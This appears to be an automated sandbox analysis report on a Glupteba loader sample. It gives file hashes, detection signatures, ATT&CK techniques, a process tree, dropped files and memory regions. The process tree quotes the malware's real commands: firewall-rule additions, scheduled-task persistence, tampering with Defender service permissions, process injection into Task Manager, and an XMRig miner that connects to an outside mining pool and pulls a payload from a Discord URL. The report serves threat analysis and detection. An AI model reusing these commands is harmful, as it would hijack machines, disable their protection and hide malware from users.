Analysis
-
max time kernel
278s -
max time network
301s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
-
submitted
18-04-2024 22:17
General
-
Target
05b8d3cf94680686a5b73128c11134b3b85c417c2f9eca5945dcbb4553413e4c.exe
-
Size
4.2MB
-
MD5
c9b0b7a85b135c6095efbca7a4290013
-
SHA1
3c737be6da8d33d6849af153c29aa08c227058af
-
SHA256
05b8d3cf94680686a5b73128c11134b3b85c417c2f9eca5945dcbb4553413e4c
-
SHA512
2f4a0b5be561ecaa1bc610abda3475dcd721c75c17809bf2699f9ed102f286692c0289da0af6d2a5d16c25d6ebaac7e12f907705040799eb35a438a098667c15
-
SSDEEP
98304:uz7Cg0ld9bGpeFIidtQ9zICqBAsCsR7hN5aqRYTU74:k7NcfZtQ9LJEd3aOYT+4
Malware Config
Signatures
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba payload 37 IoCs
-
Windows security bypass 2 TTPs 7 IoCs
-
XMRig Miner payload 2 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Modifies Windows Firewall 2 TTPs 1 IoCs
-
Executes dropped EXE 4 IoCs
-
UPX packed file 6 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Windows security modification 2 TTPs 7 IoCs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
-
Drops file in System32 directory 7 IoCs
-
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
-
Drops file in Windows directory 4 IoCs
-
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 12 IoCs
-
Suspicious use of WriteProcessMemory 36 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\05b8d3cf94680686a5b73128c11134b3b85c417c2f9eca5945dcbb4553413e4c.exe"C:\Users\Admin\AppData\Local\Temp\05b8d3cf94680686a5b73128c11134b3b85c417c2f9eca5945dcbb4553413e4c.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\05b8d3cf94680686a5b73128c11134b3b85c417c2f9eca5945dcbb4553413e4c.exe"C:\Users\Admin\AppData\Local\Temp\05b8d3cf94680686a5b73128c11134b3b85c417c2f9eca5945dcbb4553413e4c.exe"2⤵
- Windows security bypass
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)6⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
-
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exeC:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:804⤵
-
C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exeC:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id 3a05ba5c-9ef3-420d-9c1e-879c3249ca80 --tls --nicehash -o showlock.net:443 --rig-id 3a05ba5c-9ef3-420d-9c1e-879c3249ca80 --tls --nicehash -o showlock.net:80 --rig-id 3a05ba5c-9ef3-420d-9c1e-879c3249ca80 --nicehash --http-port 3433 --http-access-token 3a05ba5c-9ef3-420d-9c1e-879c3249ca80 --randomx-wrmsr=-15⤵
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe -hide 41245⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gwp15za1.gcq.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exeFilesize
2.0MB
MD5dcb505dc2b9d8aac05f4ca0727f5eadb
SHA14f633edb62de05f3d7c241c8bc19c1e0be7ced75
SHA25661f9194b9f33611ec902f02755cf2e86f0bbc84c2102c6e5d1874f9bae78e551
SHA51231e1fce9aca3b5d9afc85640af04b4542b9897f7d60b699e3153516137d9358d3c101cacc04e9e594e36b8622e9489cecf0dda210662563565d80fb9a33549b3
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeFilesize
281KB
MD5d98e33b66343e7c96158444127a117f6
SHA1bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA2565de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5
-
C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exeFilesize
5.2MB
MD54f649a57b7ddf3874c9a2163a73e9b07
SHA19c966520ba8233f13f168cade548baf5a30823ba
SHA256830afffc7dd32e007736f0d97e8d02f68f80988266e68e3de3250aa189ac8491
SHA512b2374bac551b0d4e87f38eb0090a9df0705a8600667fecba6a94e5c67ff93fc8b4707a905ce0e5ef0909e91b04dc01d74c21887a5b5958b8b2fd01faed253aac
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD5db01a2c1c7e70b2b038edf8ad5ad9826
SHA1540217c647a73bad8d8a79e3a0f3998b5abd199b
SHA256413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d
SHA512c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
18KB
MD5b6e517bbbb1360841e9b56b5b76f9e04
SHA17f8340b34092d58242ebb2308eb339ed425814db
SHA256408b7f50338d12f61f42e1cbb11faca1173148a7ff231797bfddd8a54b27d717
SHA512c72b75a2ae3e064786c57adff559109a9fb0ba5f5ed5234eb6013005d6ce7ff54c3e7a789092a18affc6b25cdd41f882a15e5a7ec0999bd749de4614fe2486be
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
18KB
MD58a9ade8ce6f208861d4f49ca58a1181d
SHA16bca63648170fbf1ee21581d611c3acb9c5ef704
SHA256a88d08c56f92c11d871292e7a91376285e9a4ecaaae44dced48647881b4bbebf
SHA512a9d3ddb10cab654d40f1012677cc8c3737236ba38df1b85f7ccb51783a04ccfb4d644a05439f627c7854fce830011b7a2b01337d5aabc1b719a83cae76ea7724
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
18KB
MD5063d4b3550e4a7e7c8274e450d939d31
SHA133f81fab5f6211274c8013882d80b0cab002f999
SHA25614f3d1b1f51a74975dd8e45bb715be021f02d2fb1ea02f3741e5a536587b3b03
SHA512efbec2780427ffded5162f9491dec65c71d44ba1d8f72683d231c9da23f5d32b8d0ca81918dafeb7160817898ce168640f9ab07bbcf1416f62b14ab3bcd96324
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
18KB
MD53c8d4f529ea2d30672d2ddda38e6b3d0
SHA13a537c4dd4df23b425e2484b7fd1cced6e3aadc2
SHA2569526017fb3d004ec8596cfbcab061828d24e67c7fb5a33fe3c6cbcbd3441d807
SHA51238e1ca00eebf8fe02464a980826ef999c91442ff1b108113bea7de92b7548a0a02bfa28a9d7f90b6efd321980aabe7af40ef8a0d850e87f61d48a53ed76d2ab6
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
18KB
MD5a6c3787f72bce6ec32d9ec4471d13d01
SHA12b7aaecc630c177310c921bb8f3ad714747913fd
SHA2560dc478df5d07d16d01e76d9e0800534953ff21eb6949621f6564e0686944142c
SHA5124217858fd052edfbe3ae6017912d9735a12d6f9020fdfb45fdfabb8f64a98d2780768334d4fd033e808e1ecc8c216bea00a438440e493e8fa160e8898aab81b5
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
18KB
MD5f39b45a50a0031c0ca1cca0e570830b0
SHA13866058c1bfc53ac296d3f040657e3d14e161c1e
SHA25646c0343f200affb1824b1d242e9b44ac98308aabd2007dfbe3cd2f21c62ff58d
SHA5128f14e0ddefe458eadaab3c44259986346e078e062f639819e61bb3934285e71bfe13641cb42d4e7fc7993ce263071f1b16c423b175c658b56c657cf95b189a8e
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
18KB
MD5434a3f16e737c630e1f1dfa828ea048f
SHA1b1c110a79348c094383cebdcfecffde57e5d5456
SHA25627b35ff362a1fb4fbda2adb13ef19824e0958cb468e302a56cf269202c410146
SHA512ebc782c604c5582825a897da732e37b2f46b2a56174e573e83615d10147f305f1227f00bae02a511f0dcb83c28b9723a084bee5389337beb983b3eacc820608a
-
C:\Windows\rss\csrss.exeFilesize
4.2MB
MD5c9b0b7a85b135c6095efbca7a4290013
SHA13c737be6da8d33d6849af153c29aa08c227058af
SHA25605b8d3cf94680686a5b73128c11134b3b85c417c2f9eca5945dcbb4553413e4c
SHA5122f4a0b5be561ecaa1bc610abda3475dcd721c75c17809bf2699f9ed102f286692c0289da0af6d2a5d16c25d6ebaac7e12f907705040799eb35a438a098667c15
-
C:\Windows\windefender.exeFilesize
2.0MB
MD58e67f58837092385dcf01e8a2b4f5783
SHA1012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA51240d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec
-
memory/916-2148-0x0000000000400000-0x00000000008E1000-memory.dmpFilesize
4.9MB
-
memory/1512-15-0x0000000007F80000-0x0000000007F9C000-memory.dmpFilesize
112KB
-
memory/1512-8-0x0000000006E10000-0x0000000006E20000-memory.dmpFilesize
64KB
-
memory/1512-73-0x0000000009F10000-0x0000000009F43000-memory.dmpFilesize
204KB
-
memory/1512-74-0x0000000070340000-0x000000007038B000-memory.dmpFilesize
300KB
-
memory/1512-75-0x0000000070390000-0x00000000706E0000-memory.dmpFilesize
3.3MB
-
memory/1512-76-0x0000000009EF0000-0x0000000009F0E000-memory.dmpFilesize
120KB
-
memory/1512-81-0x0000000009F50000-0x0000000009FF5000-memory.dmpFilesize
660KB
-
memory/1512-82-0x0000000006E10000-0x0000000006E20000-memory.dmpFilesize
64KB
-
memory/1512-83-0x000000000A130000-0x000000000A1C4000-memory.dmpFilesize
592KB
-
memory/1512-276-0x000000000A0D0000-0x000000000A0EA000-memory.dmpFilesize
104KB
-
memory/1512-281-0x000000000A0C0000-0x000000000A0C8000-memory.dmpFilesize
32KB
-
memory/1512-299-0x0000000073630000-0x0000000073D1E000-memory.dmpFilesize
6.9MB
-
memory/1512-7-0x0000000073630000-0x0000000073D1E000-memory.dmpFilesize
6.9MB
-
memory/1512-6-0x0000000004AE0000-0x0000000004B16000-memory.dmpFilesize
216KB
-
memory/1512-66-0x00000000090B0000-0x0000000009126000-memory.dmpFilesize
472KB
-
memory/1512-9-0x0000000006E10000-0x0000000006E20000-memory.dmpFilesize
64KB
-
memory/1512-10-0x0000000007450000-0x0000000007A78000-memory.dmpFilesize
6.2MB
-
memory/1512-35-0x0000000008FF0000-0x000000000902C000-memory.dmpFilesize
240KB
-
memory/1512-16-0x0000000007FC0000-0x000000000800B000-memory.dmpFilesize
300KB
-
memory/1512-11-0x00000000071E0000-0x0000000007202000-memory.dmpFilesize
136KB
-
memory/1512-14-0x0000000007C10000-0x0000000007F60000-memory.dmpFilesize
3.3MB
-
memory/1512-13-0x0000000007A80000-0x0000000007AE6000-memory.dmpFilesize
408KB
-
memory/1512-12-0x0000000007AF0000-0x0000000007B56000-memory.dmpFilesize
408KB
-
memory/1844-1818-0x0000000000400000-0x00000000008DF000-memory.dmpFilesize
4.9MB
-
memory/1844-1812-0x0000000000400000-0x00000000008DF000-memory.dmpFilesize
4.9MB
-
memory/2196-1052-0x00000000010C0000-0x00000000010D0000-memory.dmpFilesize
64KB
-
memory/2196-1050-0x0000000073690000-0x0000000073D7E000-memory.dmpFilesize
6.9MB
-
memory/2196-1051-0x00000000010C0000-0x00000000010D0000-memory.dmpFilesize
64KB
-
memory/2896-1042-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/2896-303-0x0000000004D00000-0x0000000005106000-memory.dmpFilesize
4.0MB
-
memory/2896-578-0x0000000004D00000-0x0000000005106000-memory.dmpFilesize
4.0MB
-
memory/2896-304-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/2896-828-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/2896-801-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/3740-2471-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/3800-302-0x0000000005110000-0x00000000059FB000-memory.dmpFilesize
8.9MB
-
memory/3800-300-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/3800-1-0x0000000004D00000-0x0000000005105000-memory.dmpFilesize
4.0MB
-
memory/3800-3-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/3800-2-0x0000000005110000-0x00000000059FB000-memory.dmpFilesize
8.9MB
-
memory/3840-800-0x0000000007AD0000-0x0000000007E20000-memory.dmpFilesize
3.3MB
-
memory/3840-802-0x00000000047F0000-0x0000000004800000-memory.dmpFilesize
64KB
-
memory/3840-798-0x0000000073730000-0x0000000073E1E000-memory.dmpFilesize
6.9MB
-
memory/3840-822-0x0000000070460000-0x00000000704AB000-memory.dmpFilesize
300KB
-
memory/3840-823-0x00000000704D0000-0x0000000070820000-memory.dmpFilesize
3.3MB
-
memory/3840-799-0x00000000047F0000-0x0000000004800000-memory.dmpFilesize
64KB
-
memory/3840-832-0x00000000047F0000-0x0000000004800000-memory.dmpFilesize
64KB
-
memory/3840-1038-0x0000000073730000-0x0000000073E1E000-memory.dmpFilesize
6.9MB
-
memory/4124-2155-0x0000027EFB5C0000-0x0000027EFB5E0000-memory.dmpFilesize
128KB
-
memory/4144-579-0x0000000070460000-0x00000000704AB000-memory.dmpFilesize
300KB
-
memory/4144-556-0x0000000073730000-0x0000000073E1E000-memory.dmpFilesize
6.9MB
-
memory/4144-581-0x00000000704B0000-0x0000000070800000-memory.dmpFilesize
3.3MB
-
memory/4144-586-0x0000000007200000-0x0000000007210000-memory.dmpFilesize
64KB
-
memory/4144-557-0x0000000007200000-0x0000000007210000-memory.dmpFilesize
64KB
-
memory/4144-580-0x000000007E7E0000-0x000000007E7F0000-memory.dmpFilesize
64KB
-
memory/4144-795-0x0000000073730000-0x0000000073E1E000-memory.dmpFilesize
6.9MB
-
memory/4144-558-0x0000000007200000-0x0000000007210000-memory.dmpFilesize
64KB
-
memory/4572-308-0x0000000004FB0000-0x0000000004FC0000-memory.dmpFilesize
64KB
-
memory/4572-307-0x0000000073730000-0x0000000073E1E000-memory.dmpFilesize
6.9MB
-
memory/4572-552-0x0000000073730000-0x0000000073E1E000-memory.dmpFilesize
6.9MB
-
memory/4572-309-0x0000000004FB0000-0x0000000004FC0000-memory.dmpFilesize
64KB
-
memory/4572-338-0x0000000004FB0000-0x0000000004FC0000-memory.dmpFilesize
64KB
-
memory/4572-337-0x0000000009D50000-0x0000000009DF5000-memory.dmpFilesize
660KB
-
memory/4572-310-0x0000000008400000-0x0000000008750000-memory.dmpFilesize
3.3MB
-
memory/4572-311-0x0000000008800000-0x000000000884B000-memory.dmpFilesize
300KB
-
memory/4572-330-0x000000007EC50000-0x000000007EC60000-memory.dmpFilesize
64KB
-
memory/4572-331-0x0000000070460000-0x00000000704AB000-memory.dmpFilesize
300KB
-
memory/4572-332-0x00000000704B0000-0x0000000070800000-memory.dmpFilesize
3.3MB
-
memory/5028-1804-0x0000000000400000-0x00000000008DF000-memory.dmpFilesize
4.9MB
-
memory/5032-1813-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/5032-1841-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/5032-1817-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/5032-1811-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/5032-1820-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/5032-1821-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/5032-1823-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/5032-1825-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/5032-1827-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/5032-1830-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/5032-1831-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/5032-1833-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/5032-1835-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/5032-1837-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/5032-1840-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/5032-1815-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/5032-1843-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/5032-1845-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/5032-1847-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/5032-1850-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/5032-1851-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/5032-1810-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/5032-1807-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/5032-2105-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/5032-1805-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/5032-1791-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/5032-1047-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/5032-1046-0x0000000005600000-0x0000000005EEB000-memory.dmpFilesize
8.9MB
-
memory/5032-2349-0x0000000000400000-0x0000000003118000-memory.dmpFilesize
45.1MB
-
memory/5032-1045-0x0000000005200000-0x00000000055F9000-memory.dmpFilesize
4.0MB